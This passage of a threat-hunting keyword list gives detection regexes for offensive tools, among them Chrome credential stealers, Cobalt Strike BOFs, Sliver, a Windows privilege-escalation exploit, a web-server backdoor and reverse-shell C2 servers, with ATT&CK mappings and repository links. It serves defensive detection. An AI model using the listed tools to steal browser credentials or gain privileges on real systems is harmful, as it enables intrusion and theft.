"*chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802*",".{0,1000}chompie1337\/Windows_MSKSSRV_LPE_CVE\-2023\-36802.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","38209" "*Choose The RPC Function [1]VpnProtEngWinRtConnect [2]VpnProtEngGetInterface*",".{0,1000}Choose\sThe\sRPC\sFunction\s\[1\]VpnProtEngWinRtConnect\s\[2\]VpnProtEngGetInterface.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","38210" "*Choosing DLL to hijack.*",".{0,1000}Choosing\sDLL\sto\shijack\..{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","38211" "*chop target username password domain filename chd wmi*",".{0,1000}chop\starget\susername\spassword\sdomain\sfilename\schd\swmi.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38212" "*chopper.exe 
-m*",".{0,1000}chopper\.exe\s\-m.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38213" "*chopper.exe -s*",".{0,1000}chopper\.exe\s\-s.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38214" "*chopper.exe -w*",".{0,1000}chopper\.exe\s\-w.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38215" "*chown root %s chmod 4755 %s %s*",".{0,1000}chown\sroot\s\%s\s\schmod\s4755\s\%s\s\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38218" "*Chredx765ome\\Usedx765er Datedx765a*",".{0,1000}Chredx765ome\\\\Usedx765er\sDatedx765a.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 
- T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","38221" "*chrismaddalena/SharpCloud*",".{0,1000}chrismaddalena\/SharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","38222" "*chrispetrou/HRShell*",".{0,1000}chrispetrou\/HRShell.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","38223" "*christophetd/spoofing-office-macro*",".{0,1000}christophetd\/spoofing\-office\-macro.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","38224" "*Chroedx765mium\\Useedx765r Data*",".{0,1000}Chroedx765mium\\\\Useedx765r\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - 
T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","38225" "*Chrome App-Bound Encryption - Decryption*",".{0,1000}Chrome\sApp\-Bound\sEncryption\s\-\sDecryption.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","38226" "*Chrome Password Recovery*",".{0,1000}Chrome\sPassword\sRecovery.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38227" "*Chrome Passwords List!*",".{0,1000}Chrome\sPasswords\sList!.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. 
Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38228" "*chrome_creds.txt*",".{0,1000}chrome_creds\.txt.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","38232" "*ChromeAppBound::BytesToHexString(en crypted_key.data*",".{0,1000}ChromeAppBound\:\:BytesToHexString\(en\scrypted_key\.data.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","38233" "*chromecertbeggar.js*",".{0,1000}chromecertbeggar\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38234" "*chromecertbeggar2.js*",".{0,1000}chromecertbeggar2\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38235" "*chrome-dump.dll*",".{0,1000}chrome\-dump\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38239" "*ChromeDump.git*",".{0,1000}ChromeDump\.git.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other resources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","38240" "*chromedump.py*",".{0,1000}chromedump\.py.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other resources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","38241" "*chrome-dump.x86.dll*",".{0,1000}chrome\-dump\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 -
T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38242" "*ChromeDump-main.zip*",".{0,1000}ChromeDump\-main\.zip.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other resources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","38243" "*ChromeKatz/Memory.cpp*",".{0,1000}ChromeKatz\/Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38244" "*ChromeKatz/Process.cpp*",".{0,1000}ChromeKatz\/Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38245" "*ChromeKatz\Memory.cpp*",".{0,1000}ChromeKatz\\Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38246"
"*ChromeKatz\Process.cpp*",".{0,1000}ChromeKatz\\Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","38247" "*chromeKey.x64*",".{0,1000}chromeKey\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38248" "*chromeKey.x86*",".{0,1000}chromeKey\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38249" "*chromepass.exe*",".{0,1000}chromepass\.exe.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you 
to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38250" "*chromepass.zip*",".{0,1000}chromepass\.zip.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. 
or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38251" "*ChromeStealer.exe*",".{0,1000}ChromeStealer\.exe.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","1","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","38255" "*Chromium Bookmarks Snatch Failed*",".{0,1000}Chromium\sBookmarks\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38256" "*Chromium Cookie Snatch Failed*",".{0,1000}Chromium\sCookie\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38257" "*Chromium History Snatch Failed*",".{0,1000}Chromium\sHistory\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38258" "*Chromium Password Snatch Failed*",".{0,1000}Chromium\sPassword\sSnatch\sFailed.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","38259" "*chromiumkeydump *",".{0,1000}chromiumkeydump\s.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38260" "*chromiumkeydump*",".{0,1000}chromiumkeydump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38261" "*ChromiumKeyDump.cna*",".{0,1000}ChromiumKeyDump\.cna.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38262" "*ChromiumKeyDump.cpp*",".{0,1000}ChromiumKeyDump\.cpp.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38263" "*ChromiumKeyDump.exe*",".{0,1000}ChromiumKeyDump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38264" "*Chudry/Xerror*",".{0,1000}Chudry\/Xerror.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","38266" 
"*chunk-Proxy.jar*",".{0,1000}chunk\-Proxy\.jar.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","38267" "*chunlie.exe*",".{0,1000}chunlie\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38268" "*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*",".{0,1000}cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","38269" "*chvancooten/nimbuild*",".{0,1000}chvancooten\/nimbuild.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38270" 
